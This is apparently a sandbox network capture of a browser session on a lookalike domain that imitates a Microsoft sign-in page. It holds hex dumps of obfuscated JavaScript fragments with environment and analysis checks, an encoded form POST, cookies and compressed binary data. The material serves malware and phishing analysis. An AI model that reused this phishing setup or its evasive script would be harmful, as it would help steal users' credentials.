                                              2024-04-26 14:56:17 UTC16384INData Raw: 63 38 30 33 0d 0a 30 3a 68 3b 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 5b 46 45 28 30 78 34 64 39 29 5d 3c 30 78 32 3f 28 52 3d 47 5b 68 5d 2c 4a 28 52 29 3f 52 3a 76 6f 69 64 20 30 78 30 29 3a 62 5b 62 5d 26 26 68 5b 75 5d 5b 52 5d 3b 76 61 72 20 52 3b 7d 7d 2c 30 78 31 62 32 63 3a 66 75 6e 63 74 69 6f 6e 28 4c 2c 47 2c 4a 29 7b 76 61 72 20 46 6c 3d 61 30 79 3b 69 66 28 27 68 6f 54 4b 49 27 21 3d 3d 46 6c 28 30 78 32 63 39 29 29 7b 76 61 72 20 62 3d 4a 28 30 78 33 61 61 29 2c 68 3d 4a 28 30 78 31 30 65 65 29 3b 4c 5b 46 6c 28 30 78 33 33 62 29 5d 3d 21 62 26 26 21 68 26 26 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 46 6c 28 30 78 32 31 31 29 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3b 7d
                                              Data Ascii: c8030:h;}else{return arguments[FE(0x4d9)]<0x2?(R=G[h],J(R)?R:void 0x0):b[b]&&h[u][R];var R;}},0x1b2c:function(L,G,J){var Fl=a0y;if('hoTKI'!==Fl(0x2c9)){var b=J(0x3aa),h=J(0x10ee);L[Fl(0x33b)]=!b&&!h&&'object'==typeof window&&Fl(0x211)==typeof document;}
                                              2024-04-26 14:56:17 UTC16384INData Raw: 20 62 3d 4a 28 30 78 37 33 62 29 5b 27 49 74 65 72 61 74 6f 72 50 72 6f 74 6f 74 79 70 65 27 5d 2c 68 3d 4a 28 30 78 31 34 61 61 29 2c 52 3d 4a 28 30 78 31 65 33 61 29 2c 78 3d 4a 28 30 78 38 65 35 29 2c 6b 3d 4a 28 30 78 31 61 37 37 29 2c 57 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 3b 4c 5b 27 65 78 70 6f 72 74 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 42 2c 5a 2c 6a 29 7b 76 61 72 20 79 42 3d 61 30 79 2c 59 3d 42 2b 79 42 28 30 78 34 66 34 29 3b 72 65 74 75 72 6e 20 70 5b 79 42 28 30 78 33 66 36 29 5d 3d 68 28 62 2c 7b 27 6e 65 78 74 27 3a 52 28 2b 21 6a 2c 5a 29 7d 29 2c 78 28 70 2c 59 2c 21 30 78 31 2c 21 30 78 30 29 2c 6b 5b 59 5d 3d 57 2c 70 3b 7d 3b 7d 2c 30 78 31 36 31 65 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 4a
                                              Data Ascii: b=J(0x73b)['IteratorPrototype'],h=J(0x14aa),R=J(0x1e3a),x=J(0x8e5),k=J(0x1a77),W=function(){return this;};L['exports']=function(p,B,Z,j){var yB=a0y,Y=B+yB(0x4f4);return p[yB(0x3f6)]=h(b,{'next':R(+!j,Z)}),x(p,Y,!0x1,!0x0),k[Y]=W,p;};},0x161e:function(G,J
                                              2024-04-26 14:56:17 UTC16384INData Raw: 4a 28 68 29 26 26 75 5b 73 41 28 30 78 32 32 39 29 5d 3d 3d 3d 52 29 72 65 74 75 72 6e 20 78 3b 76 61 72 20 52 3d 6b 5b 27 66 27 5d 28 57 29 3b 72 65 74 75 72 6e 28 30 78 30 2c 52 5b 27 72 65 73 6f 6c 76 65 27 5d 29 28 52 29 2c 52 5b 73 41 28 30 78 33 64 39 29 5d 3b 7d 7d 3b 7d 65 6c 73 65 7b 76 61 72 20 68 3d 6f 28 4a 5b 27 72 65 73 6f 6c 76 65 27 5d 29 2c 75 3d 5b 5d 2c 52 3d 30 78 30 2c 78 3d 30 78 31 3b 62 28 4a 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 76 61 72 20 59 3d 52 2b 2b 2c 49 3d 21 30 78 31 3b 78 2b 2b 2c 68 28 68 2c 68 2c 6a 29 5b 27 74 68 65 6e 27 5d 28 66 75 6e 63 74 69 6f 6e 28 4d 29 7b 49 7c 7c 28 49 3d 21 30 78 30 2c 75 5b 59 5d 3d 4d 2c 2d 2d 78 7c 7c 75 28 75 29 29 3b 7d 2c 78 29 3b 7d 29 2c 2d 2d 78 7c 7c 6b 28 75 29 3b 7d 7d 2c 30 78
                                              Data Ascii: J(h)&&u[sA(0x229)]===R)return x;var R=k['f'](W);return(0x0,R['resolve'])(R),R[sA(0x3d9)];}};}else{var h=o(J['resolve']),u=[],R=0x0,x=0x1;b(J,function(j){var Y=R++,I=!0x1;x++,h(h,h,j)['then'](function(M){I||(I=!0x0,u[Y]=M,--x||u(u));},x);}),--x||k(u);}},0x
                                              2024-04-26 14:56:17 UTC2059INData Raw: 3d 75 28 74 68 69 73 29 2c 57 3d 52 28 6b 2c 27 6e 75 6d 62 65 72 27 29 3b 72 65 74 75 72 6e 20 47 39 28 30 78 33 65 36 29 21 3d 74 79 70 65 6f 66 20 57 7c 7c 69 73 46 69 6e 69 74 65 28 57 29 3f 6b 5b 47 39 28 30 78 33 65 64 29 5d 28 29 3a 6e 75 6c 6c 3b 7d 7d 29 3b 7d 2c 30 78 37 37 34 3a 66 75 6e 63 74 69 6f 6e 28 4c 2c 47 2c 4a 29 7b 76 61 72 20 47 71 3d 61 30 79 3b 69 66 28 47 71 28 30 78 32 62 36 29 3d 3d 3d 47 71 28 30 78 32 62 36 29 29 7b 76 61 72 20 62 3d 4a 28 30 78 31 37 65 29 2c 68 3d 4a 28 30 78 38 30 30 29 5b 47 71 28 30 78 35 36 31 29 5d 2c 52 3d 4a 28 30 78 31 32 39 61 29 2c 78 3d 4a 28 30 78 66 31 38 29 2c 6b 3d 46 75 6e 63 74 69 6f 6e 5b 47 71 28 30 78 33 66 36 29 5d 2c 57 3d 52 28 6b 5b 47 71 28 30 78 35 32 35 29 5d 29 2c 70 3d 2f 66 75
                                              Data Ascii: =u(this),W=R(k,'number');return G9(0x3e6)!=typeof W||isFinite(W)?k[G9(0x3ed)]():null;}});},0x774:function(L,G,J){var Gq=a0y;if(Gq(0x2b6)===Gq(0x2b6)){var b=J(0x17e),h=J(0x800)[Gq(0x561)],R=J(0x129a),x=J(0xf18),k=Function[Gq(0x3f6)],W=R(k[Gq(0x525)]),p=/fu
                                              2024-04-26 14:56:18 UTC16384INData Raw: 34 30 30 30 0d 0a 5c 78 35 63 75 27 2b 71 30 28 55 28 71 38 2c 30 78 30 29 2c 30 78 31 30 29 3a 71 38 3b 7d 7d 3b 44 26 26 57 28 7b 27 74 61 72 67 65 74 27 3a 47 43 28 30 78 32 32 66 29 2c 27 73 74 61 74 27 3a 21 30 78 30 2c 27 61 72 69 74 79 27 3a 30 78 33 2c 27 66 6f 72 63 65 64 27 3a 71 34 7c 7c 71 35 7d 2c 7b 27 73 74 72 69 6e 67 69 66 79 27 3a 66 75 6e 63 74 69 6f 6e 28 71 38 2c 71 39 2c 71 71 29 7b 76 61 72 20 47 73 3d 47 43 2c 71 4f 3d 41 28 61 72 67 75 6d 65 6e 74 73 29 2c 71 43 3d 5a 28 71 34 3f 71 36 3a 44 2c 6e 75 6c 6c 2c 71 4f 29 3b 72 65 74 75 72 6e 20 71 35 26 26 47 73 28 30 78 32 62 63 29 3d 3d 74 79 70 65 6f 66 20 71 43 3f 58 28 71 43 2c 71 31 2c 71 37 29 3a 71 43 3b 7d 7d 29 3b 7d 2c 30 78 32 35 65 32 3a 66 75 6e 63 74 69 6f 6e 28 4c 2c
                                              Data Ascii: 4000\x5cu'+q0(U(q8,0x0),0x10):q8;}};D&&W({'target':GC(0x22f),'stat':!0x0,'arity':0x3,'forced':q4||q5},{'stringify':function(q8,q9,qq){var Gs=GC,qO=A(arguments),qC=Z(q4?q6:D,null,qO);return q5&&Gs(0x2bc)==typeof qC?X(qC,q1,q7):qC;}});},0x25e2:function(L,
                                              2024-04-26 14:56:18 UTC8INData Raw: 6f 37 28 30 78 31 0d 0a
                                              Data Ascii: o7(0x1
                                              2024-04-26 14:56:18 UTC16384INData Raw: 34 30 30 30 0d 0a 66 66 29 2c 27 73 74 61 74 27 3a 21 30 78 30 2c 27 66 6f 72 63 65 64 27 3a 21 71 39 7d 2c 7b 27 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 27 3a 4f 35 7d 29 2c 71 6a 28 29 2c 71 59 28 71 67 2c 71 51 29 2c 71 42 5b 71 7a 5d 3d 21 30 78 30 3b 7d 2c 30 78 61 61 64 3a 66 75 6e 63 74 69 6f 6e 28 4c 2c 47 2c 4a 29 7b 76 61 72 20 6f 54 3d 61 30 79 2c 52 3d 4a 28 30 78 32 31 61 34 29 2c 6b 3d 4a 28 30 78 31 37 65 29 2c 57 3d 4a 28 30 78 32 30 63 35 29 2c 42 3d 4a 28 30 78 31 32 39 61 29 2c 5a 3d 4a 28 30 78 31 36 37 62 29 2c 6a 3d 4a 28 30 78 35 63 62 29 2c 59 3d 4a 28 30 78 31 32 63 66 29 2c 49 3d 4a 28 30 78 31 38 37 35 29 2c 4d 3d 4a 28 30 78 66 31 38 29 2c 7a 3d 4a 28 30 78 31 61 34 36 29 2c 51 3d 57 5b 6f 54 28 30 78 35 65 63
                                              Data Ascii: 4000ff),'stat':!0x0,'forced':!q9},{'getOwnPropertyNames':O5}),qj(),qY(qg,qQ),qB[qz]=!0x0;},0xaad:function(L,G,J){var oT=a0y,R=J(0x21a4),k=J(0x17e),W=J(0x20c5),B=J(0x129a),Z=J(0x167b),j=J(0x5cb),Y=J(0x12cf),I=J(0x1875),M=J(0xf18),z=J(0x1a46),Q=W[oT(0x5ec
                                              2024-04-26 14:56:18 UTC16384INData Raw: 26 26 4a 32 28 30 0d 0a 64 37 62 66 0d 0a 78 33 33 39 29 69 6e 20 43 6f 5b 4a 32 28 30 78 33 66 36 29 5d 5d 29 3e 3d 30 78 34 3b 7d 66 75 6e 63 74 69 6f 6e 20 71 6a 28 29 7b 76 61 72 20 4a 33 3d 6f 49 2c 43 4c 2c 43 47 3d 77 69 6e 64 6f 77 3b 72 65 74 75 72 6e 20 43 4c 3d 43 47 5b 4a 33 28 30 78 35 35 37 29 5d 2c 21 21 2f 5e 66 75 6e 63 74 69 6f 6e 5c 73 2e 2a 3f 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 5c 73 2a 7d 24 2f 5b 27 74 65 73 74 27 5d 28 53 74 72 69 6e 67 28 43 4c 29 29 26 26 71 54 28 5b 4a 33 28 30 78 35 37 64 29 3d 3d 3d 53 74 72 69 6e 67 28 43 47 5b 4a 33 28 30 78 32 36 38 29 5d 29 2c 27 4d 69 63 72 6f 64 61 74 61 45 78 74 72 61 63 74 6f 72 27 69 6e 20 43 47 5d 29 3e 3d 30 78 31 3b 7d 66 75 6e 63 74 69 6f 6e 20 71 59 28 29 7b
                                              Data Ascii: &&J2(0d7bfx339)in Co[J2(0x3f6)]])>=0x4;}function qj(){var J3=oI,CL,CG=window;return CL=CG[J3(0x557)],!!/^function\s.*?\{\s*\[native code]\s*}$/['test'](String(CL))&&qT([J3(0x57d)===String(CG[J3(0x268)]),'MicrodataExtractor'in CG])>=0x1;}function qY(){


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.649706198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:24 UTC846OUTPOST /?PSZlk=ViP HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: keep-alive
                                              Content-Length: 4364
                                              Cache-Control: max-age=0
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              Origin: https://srmcorp.tecuidoc.com
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Referer: https://srmcorp.tecuidoc.com/?PSZlk=ViP
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:24 UTC4364OUTData Raw: 65 71 6c 72 76 3d 25 35 42 25 35 42 25 32 32 32 35 33 37 34 32 36 31 37 65 36 63 25 32 32 25 32 43 25 32 32 37 36 33 38 36 32 36 65 36 62 32 35 25 32 32 25 32 43 25 32 32 33 33 34 34 36 34 32 35 33 33 34 36 25 32 32 25 32 43 25 32 32 33 35 37 33 33 35 33 34 33 30 33 34 25 32 32 25 32 43 25 32 32 33 35 33 31 33 33 33 37 33 38 33 36 25 32 32 25 32 43 25 32 32 33 36 33 32 33 34 33 38 33 35 33 37 25 32 32 25 32 43 25 32 32 33 30 33 35 25 32 32 25 35 44 25 32 43 25 32 32 34 30 34 35 31 33 37 38 36 36 25 32 32 25 32 43 25 32 32 30 33 37 31 32 32 31 25 32 32 25 32 43 34 25 35 44 26 6a 62 63 75 78 3d 25 35 42 25 35 42 25 32 32 33 34 33 39 33 34 32 35 33 37 34 32 37 32 32 35 33 37 34 34 32 35 25 32 32 25 32 43 25 32 32 33 33 34 32 32 35 33 37 34 36 32 35 33 33 34
                                              Data Ascii: eqlrv=%5B%5B%22253742617e6c%22%2C%227638626e6b25%22%2C%22334464253346%22%2C%22357335343034%22%2C%22353133373836%22%2C%22363234383537%22%2C%223035%22%5D%2C%224045137866%22%2C%220371221%22%2C4%5D&jbcux=%5B%5B%223439342537427225374425%22%2C%22334225374625334
                                              2024-04-26 14:56:25 UTC397INHTTP/1.1 302 Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:25 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              location: https://srmcorp.tecuidoc.com/?PSZlk=ViP
                                              set-cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; Domain=tecuidoc.com; HttpOnly; Path=/; SameSite=None; Secure
                                              2024-04-26 14:56:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.64970923.204.76.112443
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:24 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2024-04-26 14:56:25 UTC466INHTTP/1.1 200 OK
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              Content-Type: application/octet-stream
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              Server: ECAcc (chd/0758)
                                              X-CID: 11
                                              X-Ms-ApiVersion: Distribute 1.2
                                              X-Ms-Region: prod-eus-z1
                                              Cache-Control: public, max-age=58040
                                              Date: Fri, 26 Apr 2024 14:56:25 GMT
                                              Connection: close
                                              X-CID: 2


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.64971123.204.76.112443
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:25 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                              Range: bytes=0-2147483646
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2024-04-26 14:56:25 UTC530INHTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              ApiVersion: Distribute 1.1
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              X-Azure-Ref: 0DZ+oYgAAAABSxwJpMgMuSLkfS640ajfFQVRBRURHRTEyMTkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                              Cache-Control: public, max-age=58034
                                              Date: Fri, 26 Apr 2024 14:56:25 GMT
                                              Content-Length: 55
                                              Connection: close
                                              X-CID: 2
                                              2024-04-26 14:56:25 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.649710198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:25 UTC855OUTGET /?PSZlk=ViP HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: keep-alive
                                              Cache-Control: max-age=0
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Referer: https://srmcorp.tecuidoc.com/?PSZlk=ViP
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:56:30 UTC781INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:29 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 55090
                                              Connection: close
                                              cache-control: no-store, no-cache
                                              pragma: no-cache
                                              vary: Accept-Encoding
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: bed02045-3a30-41e4-bda1-6c2c84412805
                                              x-ms-ests-server: 2.1.17846.6 - NEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              content-encoding: gzip
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:56:30 UTC15603INData Raw: 1f 8b 08 00 00 00 00 00 00 03 b4 7d 6b 5b e2 c8 d6 e8 f7 f9 15 ca 99 07 92 6d 44 40 f0 02 9d 61 e3 dd 6e 6f 2d 68 ab 0c 6f 9f 10 82 46 21 c1 24 28 5e f8 ef 67 ad 55 97 54 20 f4 cc 3b 7b 9f fd ec 69 93 4a 5d 56 ad 5a b5 ee 55 7c 59 de 3b df 6d dd 5e ec 2f 3d 44 c3 c1 1f bf 7d 61 7f 96 be 3c 38 56 0f fe 2e 7d 89 dc 68 e0 e0 d3 d2 a5 d3 73 03 c7 8e 5c ef 1e 3f ac c9 2f 5f 86 4e 64 2d d9 be 17 39 5e 64 66 22 67 12 ad 61 3f b5 25 fb c1 0a 42 27 32 c7 51 7f 75 2b 03 63 44 a3 55 e7 79 ec be 98 99 5d 56 7d b5 f5 36 72 32 6b 29 dd 1c ef 9b 4e ef de 49 b6 ba 59 bd 6a ac ee fa c3 91 15 b9 dd 41 7a c3 57 b7 17 3d 98 3d e7 c5 b5 9d 55 7a 31 96 5c cf 8d 5c 6b b0 1a da d6 c0 31 8b f9 82 b1 34 b4 26 ee 70 3c e4 45 25 2c 1a 87 4e 40 ef 16 f4 6d be 39 61 66 c9 b3 86 8e 99
                                              Data Ascii: }k[mD@ano-hoF!$(^gUT ;{iJ]VZU|Y;m^/=D}a<8V.}hs\?/_Nd-9^df"ga?%B'2Qu+cDUy]V}6r2k)NIYjAzW==Uz1\\k14&p<E%,N@m9af
                                              2024-04-26 14:56:30 UTC12556INData Raw: d5 ee bf c0 bc 7c 6e 50 d4 ee c5 af 45 1c 9a d7 ed fb 4e 6d 07 06 3c 04 06 7d 9a cd 02 df a6 c7 26 16 19 0d d0 62 0f 75 21 cb c1 4a 62 9d 14 2b 16 ec fc 5d a9 4b 97 d6 cb bd 74 a4 34 54 a4 6c 3a d2 44 dc 88 29 b2 e8 ac 93 f0 bb 69 28 f4 13 ef 06 63 68 28 37 da d2 9c a8 90 a4 15 7c 02 18 aa b3 b5 69 e8 7b f3 46 50 5a ee f0 c1 3f 6d 11 97 bd 47 d5 71 03 16 b6 9d 63 67 19 a1 bb 98 54 51 61 e7 43 5d 03 c5 c0 e4 5a 7a 55 0b db c3 8e 69 03 f9 08 1a 00 88 95 e9 f2 f1 0e 85 66 9b f3 4f fd 3b 3b 87 cb 74 88 18 2f eb 3a cc ee 70 7e 95 09 4d 82 1f 39 1e ec 27 61 de 62 dd ec 0b 68 1d 33 66 2f 52 00 95 bf 06 6e 14 97 95 a9 8c 9b c3 57 a8 28 c9 9c d6 2b c3 95 9e 68 57 5c 32 ad 5d 51 22 17 07 ca 76 f4 8e 74 ba d2 6e bc aa 8b 97 ea 15 ab d4 5f 9f ad e3 7e 7e ba ec 5b a9
                                              Data Ascii: |nPENm<}&bu!Jb+]Kt4Tl:D)i(ch(7|i{FPZ?mGqcgTQaC]ZzUifO;;t/:p~M9'abh3f/RnW(+hW\2]Q"vtn_~~[
                                              2024-04-26 14:56:30 UTC16384INData Raw: a9 5b 23 bb f9 22 c9 24 10 a9 1a d1 eb b7 34 27 d7 df 48 07 7d ab 3d 18 59 7b aa cb 65 1f 4d 1d 2e 8d c7 65 d3 a8 e0 f7 2d e7 fd 73 cb bf ff d9 78 f1 7c 17 d0 d3 3c 4a b1 b5 43 cf 2e cb da 47 79 14 5b 1b 0f cd 20 6b b9 62 06 39 bf dd ad 91 15 77 41 bc 1d da b0 2b ee 47 bd 97 fa 74 3a 1a 4e c8 24 1f 05 bc 92 8d fd 30 81 aa 85 6c bb 93 d9 13 da 2c b0 af 83 64 18 92 70 b6 88 ef 8f d9 2c b5 06 27 f1 03 52 d0 28 a9 52 c5 6c 92 d0 b7 c4 32 dc 2d 44 e0 0a 02 3f f3 f8 f0 32 ea 0d df 08 29 15 96 d6 c3 cd 28 53 39 4f 4c ee bb 5f 7b a8 bc 63 51 64 c7 bd 35 24 59 05 cb 95 43 4b 0c 5e 23 53 8a 7d 07 e5 dd 35 e5 a9 5b 47 ba 38 a8 c1 b2 62 67 11 fe e5 05 75 0a 7b 8b 84 69 a4 80 f8 26 77 7f 05 21 be a0 6b 3f f8 19 cd 4c af 94 73 20 61 ea 5c 45 33 50 f3 8f b1 f9 d0 78 b4
                                              Data Ascii: [#"$4'H}=Y{eM.e-sx|<JC.Gy[ kb9wA+Gt:N$0l,dp,'R(Rl2-D?2)(S9OL_{cQd5$YCK^#S}5[G8bgu{i&w!k?Ls a\E3Px
                                              2024-04-26 14:56:30 UTC10547INData Raw: 34 39 77 47 db 49 d1 53 fa 9d 14 fa 9d 40 c0 25 19 4e b9 13 ca e2 91 83 2f 33 0b 1f e7 f7 c3 4e d4 7b 31 62 67 6b 78 9e 0a 2e d9 50 57 1b 9a c3 3f 8c 1e fe 1e 85 f2 48 d8 38 76 42 b5 94 e3 d6 0c 74 ef c4 4b b1 74 53 11 27 fb b7 78 a0 df fb 54 5f eb ce 85 de 85 64 1f bf c5 c1 75 9a 87 af 77 43 63 26 c6 ae 6c 5d ca 22 ae 8b cf 78 14 99 12 c5 f7 b1 f3 d3 ef 5c a0 69 5d c7 d8 8d 1f f0 0f 1d 7f 04 8f 01 8c 64 22 66 76 8a f9 a7 c2 c7 74 e0 92 8f 9b 6b 9b e9 5f c9 6b 0c 82 a7 ef 3e 87 fc df b4 a7 fd 28 e5 30 ba 8a 40 18 a6 c7 7b ea 5c 69 2a 89 1e a3 71 7e 0f 22 21 53 fb a6 e8 9a a8 d5 3a 6c 13 4d 0e a2 1d b6 96 ee 19 ae 46 5f 09 07 d6 95 00 75 32 6e 2a 5a 1f 6b 15 11 db d0 79 64 07 8f f4 4d 89 73 11 ac 3c 8c c9 44 97 59 ac 08 2d 13 e4 18 a9 36 68 a8 51 71 18 36
                                              Data Ascii: 49wGIS@%N/3N{1bgkx.PW?H8vBtKtS'xT_duwCc&l]"x\i]d"fvtk_k>(0@{\i*q~"!S:lMF_u2n*ZkydMs<DY-6hQq6


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.649720198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:56:30 UTC635OUTGET /shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js HTTP/1.1
                                              Host: eccd3fea-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://srmcorp.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://srmcorp.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:56:34 UTC745INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:56:33 GMT
                                              Content-Type: application/x-javascript
                                              Content-Length: 49636
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 2435867
                                              cache-control: public, max-age=31536000
                                              etag: 0x8DC4DBF5E20DC85
                                              last-modified: Tue, 26 Mar 2024 18:05:49 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: f7fc00f0-301e-00d4-46c2-81c248000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:56:34 UTC13689INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd eb 5b e3 38 d2 38 fa fd fd 2b 82 77 0f 13 4f 8c c9 05 68 70 da cd 2f 0d 74 37 33 40 18 02 73 59 60 79 9c 58 01 4f 07 3b 6b 3b 5c 06 72 fe f6 53 17 c9 96 1d 87 ee d9 f7 3c e7 cb 99 4b b0 a5 92 2c 95 aa 4a 55 a5 92 b4 fe e3 ca ff d4 7e ac ad 7d ff 3f b5 c1 79 ef ec bc d6 ff 54 3b ff 72 78 b6 5f 3b 85 b7 3f 6a 27 fd f3 c3 bd 83 ef af 07 3f 8a ff 9f df 05 49 6d 1c 4c 44 0d fe 0e bd 44 f8 b5 28 ac 45 71 2d 08 47 51 3c 8d 62 2f 15 49 ed 1e 7e e3 c0 9b d4 c6 71 74 5f 4b ef 44 6d 1a 47 7f 8a 51 9a d4 26 41 92 42 a1 a1 98 44 8f b5 3a 54 17 fb b5 53 2f 4e 9f 6b 87 a7 a6 0d f5 0b a8 2d b8 0d 42 28 3d 8a a6 cf f0 7c 97 d6 c2 28 0d 46 a2 e6 85 3e d5 36 81 97 30 11 b5 59 e8 8b b8 f6 78 17 8c ee 6a c7 c1 28 8e 92 68 9c d6 62 31 12 c1
                                              Data Ascii: [88+wOhp/t73@sY`yXO;k;\rS<K,JU~}?yT;rx_;?j'?ImLDD(Eq-GQ<b/I~qt_KDmGQ&ABD:TS/Nk-B(=|(F>60Yxj(hb1
